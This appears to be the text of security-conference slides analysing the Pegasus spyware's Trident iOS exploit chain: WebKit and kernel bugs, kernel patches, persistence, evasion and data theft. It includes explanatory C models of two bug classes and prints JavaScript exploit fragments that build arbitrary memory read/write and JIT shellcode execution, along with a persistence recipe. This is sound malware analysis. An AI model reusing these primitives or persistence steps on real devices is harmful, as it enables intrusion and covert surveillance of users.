o Kiev, Ukraine
o Staff Security Researcher at Lookout
o XNU, Linux and LLVM internals
o Obfuscation and DRM systems in the past
o Fried Apple team co-founder (8.x and 9.x jailbreaks)
CVE-2016-4657 details

... may lead to arbitrary code execution
o Remote code execution in WebKit
o The vulnerability is a use-after-free
o Achieved by combining two bugs
o Not fully reliable, since it depends on the timing of the WebKit garbage collector
```cpp
// Excerpt from MarkedArgumentBuffer::slowAppend (JavaScriptCore runtime/ArgList.cpp)
    int newCapacity = m_capacity * 4;
    EncodedJSValue* newBuffer = new EncodedJSValue[newCapacity];
    for (int i = 0; i < m_capacity; ++i)
        newBuffer[i] = m_buffer[i];          // copy from stack to heap

    m_buffer = newBuffer;                    // move the actual buffer pointer to
    m_capacity = newCapacity;                // the new heap backing

    slotFor(m_size) = JSValue::encode(v);
    ++m_size;

    for (int i = 0; i < m_size; ++i) {
        Heap* heap = Heap::heap(JSValue::decode(slotFor(i)));
        if (!heap)
            continue;                        // no heap for this value: keep looking
        m_markSet = &heap->markListSet();    // add the MarkedArgumentBuffer
        m_markSet->add(this);                // to the heap markset
        break;
    }
    ...
```

o Move the buffer from the stack to the heap
o Get the heap context and add the MarkedArgumentBuffer to the heap markListSet
o Do not add to the markset if heap is null

Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/ArgList.cpp
o A user-defined method call may release the reference to an object
o Objects are moved from the stack to the heap
o Any reference held in the heap-backed buffer (from the 9th entry on) may be unprotected from garbage collection
Stage 2 - Payload

o Contains shellcode and compressed data
o The shellcode is used for kernel exploitation from Safari
o The compressed data holds:
  o the Stage 3 loader (downloads and decrypts Stage 3)
  o a configuration file (keys and links)
CVE-2016-4655 details

... disclose kernel memory
o Infoleak used to obtain kernel addresses and bypass KASLR
o The OSNumber constructor and OSUnserializeBinary were missing bounds checks on the bit count
o Uses an OSNumber object with a high number of bits
o Triggered in is_io_registry_entry_get_property_bytes
o Can be triggered from within an app's sandbox
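Added illustration of the bug class on this slide; this is a hypothetical model, not XNU's OSNumber or the Pegasus code. The struct `model_number` is an 8-byte value plus a caller-controlled bit count, and `secret` stands in for whatever kernel data sits after the value in memory. `get_bytes_vuln` derives the byte count from `num_bits` with no check that it fits the value, so a large bit count copies adjacent memory out to the caller; `init_fixed` rejects bit counts above 64 at construction, which is the shape of the fix, and `get_bytes_fixed` shows the matching consumer-side clamp. All names are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical model of an OSNumber-like object (not XNU's OSNumber):
 * an 8-byte value plus a caller-controlled bit count. 'secret' stands in
 * for whatever kernel data happens to sit after the value in memory.
 */
struct model_number {
    uint64_t value;      /* offset 0 */
    uint64_t secret;     /* offset 8: must never reach userspace */
    uint32_t num_bits;   /* attacker-controlled via the serialized object */
};

/*
 * Vulnerable: the number of bytes handed back is derived from num_bits
 * with no check that it fits inside the 8-byte value, so num_bits > 64
 * over-reads into 'secret'. Only the caller's buffer size is honoured.
 */
size_t get_bytes_vuln(const struct model_number *n, uint8_t *out, size_t out_len)
{
    size_t nbytes = ((size_t)n->num_bits + 7) / 8;
    if (nbytes > out_len)
        nbytes = out_len;
    memcpy(out, n, nbytes);          /* 'value' is at offset 0 of the struct */
    return nbytes;
}

/*
 * Fixed at construction: reject a bit count the value cannot hold, so no
 * consumer can later derive an oversized length from it.
 */
bool init_fixed(struct model_number *n, uint64_t value, uint32_t num_bits)
{
    if (num_bits == 0 || num_bits > 64)
        return false;
    n->value = value;
    n->secret = 0;
    n->num_bits = num_bits;
    return true;
}

/* Defensive consumer: clamp to the size of the value regardless of num_bits. */
size_t get_bytes_fixed(const struct model_number *n, uint8_t *out, size_t out_len)
{
    size_t nbytes = ((size_t)n->num_bits + 7) / 8;
    if (nbytes > sizeof(n->value))
        nbytes = sizeof(n->value);
    if (nbytes > out_len)
        nbytes = out_len;
    memcpy(out, &n->value, nbytes);
    return nbytes;
}

/*
 * Constructed scenario: a number claiming 128 bits is read through the
 * vulnerable path. Returns how many bytes of 'secret' came back (8 here).
 */
size_t leaked_secret_bytes(void)
{
    struct model_number n = { 0x1122334455667788ULL, 0xDEADBEEFCAFEBABEULL, 128 };
    uint8_t out[16] = {0};
    size_t got = get_bytes_vuln(&n, out, sizeof out);
    size_t leaked = 0;
    for (size_t i = 8; i < got; i++)
        if (out[i] == ((const uint8_t *)&n.secret)[i - 8])
            leaked++;
    return leaked;
}

int main(void)
{
    struct model_number n;
    printf("vulnerable path leaked %zu bytes of adjacent memory\n", leaked_secret_bytes());
    printf("init_fixed accepts 128 bits: %d\n", init_fixed(&n, 1, 128));
    return 0;
}
```

The over-read here stays inside the same struct so the program is well defined; in the kernel the same arithmetic walks past the heap allocation that holds the number, which is what turns a parsing bug into a KASLR bypass.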
CVE-2016-4656 details

... execute arbitrary code with kernel privileges
o Use-after-free used to gain kernel-level code execution
o The setAtIndex macro does not retain the object it stores
o Triggered in OSUnserializeBinary
o Can be triggered from within an app's sandbox
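Added illustration of why a store that takes no reference becomes a use-after-free; this is a hypothetical model, not XNU's OSUnserializeBinary or the Pegasus trigger. It models a refcounted object and the index table an unserializer keeps so that later entries can refer back to earlier objects: `set_at_index_vuln` stores a raw pointer without retaining, like the setAtIndex macro on the slide, while `set_at_index_fixed` takes a reference for as long as the entry exists. A real kernel frees the memory when the count hits zero; the model only sets a flag so the dangling access stays observable. All names are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical refcounted object; 'freed' replaces an actual free() so the
 * dangling read below is safe to run. */
struct obj {
    int refcount;
    bool freed;
    int payload;
};

#define TABLE_SLOTS 8
struct obj_table {
    struct obj *slots[TABLE_SLOTS];
    bool owns_refs;      /* true when the table took a retain on its entries */
};

struct obj *obj_new(int payload)
{
    struct obj *o = malloc(sizeof *o);
    o->refcount = 1;
    o->freed = false;
    o->payload = payload;
    return o;
}

void obj_retain(struct obj *o) { o->refcount++; }

void obj_release(struct obj *o)
{
    if (--o->refcount == 0)
        o->freed = true;             /* real code: free(o) */
}

/* Vulnerable: raw pointer stored, no reference taken (the setAtIndex pattern) */
void set_at_index_vuln(struct obj_table *t, int idx, struct obj *o)
{
    t->owns_refs = false;
    t->slots[idx] = o;
}

/* Fixed: the table owns a reference for as long as the entry exists */
void set_at_index_fixed(struct obj_table *t, int idx, struct obj *o)
{
    obj_retain(o);
    t->owns_refs = true;
    t->slots[idx] = o;
}

void table_clear(struct obj_table *t)
{
    for (int i = 0; i < TABLE_SLOTS; i++) {
        if (t->slots[i] && t->owns_refs)
            obj_release(t->slots[i]);
        t->slots[i] = NULL;
    }
}

/*
 * Constructed scenario: the parser creates an object, records it in the
 * table, and its only owner later drops it. A subsequent "reference by
 * index" entry then resolves through the table. Returns true when that
 * lookup hands back a freed object, i.e. the use-after-free.
 */
bool reference_is_dangling(bool fixed)
{
    struct obj_table table = { {0}, false };
    struct obj *o = obj_new(42);          /* refcount 1, owned by the parser */

    if (fixed)
        set_at_index_fixed(&table, 0, o);
    else
        set_at_index_vuln(&table, 0, o);

    obj_release(o);                       /* the only owner drops the object */

    struct obj *ref = table.slots[0];     /* later entry refers back to index 0 */
    bool dangling = ref->freed;           /* vulnerable path: object already gone */

    table_clear(&table);
    free(o);                              /* model cleanup */
    return dangling;
}

int main(void)
{
    printf("without retain: dangling=%d\n", reference_is_dangling(false));
    printf("with retain:    dangling=%d\n", reference_is_dangling(true));
    return 0;
}
```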
Post exploitation – Kernel patches

o setuid KPP race to escalate privileges
o amfi_get_out_of_my_way to disable AMFI
o cs_enforcement_disable to disable code signature checks
o mac_mount and LwVM to remount the system partition
o JSC bug that led to unsigned code execution
o Used with the rtbuddyd trick to gain persistence
o Bad cast in setEarlyValue
o Triggerable only from a jsc process context
Exploitation – bad cast – RW primitives

```javascript
var DATAVIEW_ARRAYBUFFER_OFFSET = 0x10;
// DATAVIEW_BYTELENGTH_OFFSET, DATAVIEW_MODE_OFFSET and FAST_TYPED_ARRAY_MODE
// are defined elsewhere in the exploit (not shown on this slide)

var __dummy_ab = new ArrayBuffer(0x20);
var __dataview_init_rw = new DataView(__dummy_ab);
var __dataview_rw = new DataView(__dummy_ab);

// Trigger the bad cast: change __dataview_init_rw.m_vector to the address of __dataview_rw
setImpureGetterDelegate(__dataview_init_rw, __dataview_rw);

// Modify the m_vector of the __dataview_rw JSArrayBufferView to 0
__dataview_init_rw.setUint32(DATAVIEW_ARRAYBUFFER_OFFSET, 0, true);

// Modify the m_length of the __dataview_rw JSArrayBufferView to 0xFFFFFFFF (4 GB).
// The dataview now effectively maps all of the memory of a 32-bit process.
__dataview_init_rw.setUint32(DATAVIEW_BYTELENGTH_OFFSET, 0xFFFFFFFF, true);

// Change the underlying type of the __dataview_rw JSArrayBufferView to FastTypedArray.
__dataview_init_rw.setUint8(DATAVIEW_MODE_OFFSET, FAST_TYPED_ARRAY_MODE, true);
```

o Trigger the bad cast and overwrite m_vector
o Now we can modify object fields; reads and writes through __dataview_rw reach any address in the process
Exploitation – bad cast – exec primitive

```javascript
// Leak the address of an object (object_to_leak is whatever object the exploit needs the address of)
var dummy_ab = new ArrayBuffer(0x20);
var dataview_leak_addr = new DataView(dummy_ab);
var dataview_dv_leak = new DataView(dummy_ab);
setImpureGetterDelegate(dataview_dv_leak, dataview_leak_addr);
setImpureGetterDelegate(dataview_leak_addr, object_to_leak);
// dataview_leak_addr.m_vector now holds the address of object_to_leak;
// read it back through dataview_dv_leak, whose m_vector points at dataview_leak_addr
leaked_addr = dataview_dv_leak.getUint32(DATAVIEW_ARRAYBUFFER_OFFSET, true);

// Allocate a JIT region: build a large function body and call it enough
// times for the JIT to compile it into executable memory
var body = ' ';
for (var k = 0; k < 0x600; k++) {
    body += 'try {} catch(e) {};';
}
var to_overwrite = new Function('a', body);
for (var i = 0; i < 0x10000; i++) {
    to_overwrite();
}
```

o Leak an object address
o Allocate a JIT region, leak its address, overwrite it with shellcode and execute
Persistence mechanism

o The system launches "rtbuddyd --early-boot"
o Copy jsc to /usr/libexec/rtbuddyd
o Place the JS exploit as a symlink named "--early-boot"
o The result is the same as running "jsc js_exploit"
Techniques to prevent analysis

o One-time-use links (redirect to Google or other sites)
o Obfuscated JavaScript and Objective-C code
o Strings obfuscated with AES
o Payloads are re-encrypted with a new key each time
o Spyware components are disguised as system services
Techniques to stay undetectable

o Clears Mobile Safari history and caches
o Uses SIP for communication
o Removes itself via self-destruct mechanisms
Techniques to gather data

o Records video from the camera
o Gathers SIM card and cell network information
o Gathers GPS location
o Gathers keychain passwords (including WiFi and router passwords)
Application hooking

o ... on each other
o On a jailbroken device we can install spying "hooks"
o Pegasus uses Cydia Substrate to install application hooks
o Dynamic libraries are injected into the application processes
o Cynject is used to inject into already running processes
Historical analysis

o ... user interaction required
o The exploit chain can be triggered from within the application sandbox
o The 2011 public jailbreak "jailbreakme 3" is the most similar
o Luca Todesco used one Trident exploit for jbme in 2016
Special thanks

o ... Scott-Railton, and Ron Deibert
o Lookout: Andrew Blaich, Seth Hardy, John Roark, Robert Nickle, Michael Flossman, Christina Olson, Christoph Hebeisen, Pat Ford, Colin Streicher, Kristy Edwards and Mike Murray
o Divergent Security: Cris Neckar, Greg Sinclair
o Individual researchers: in7egral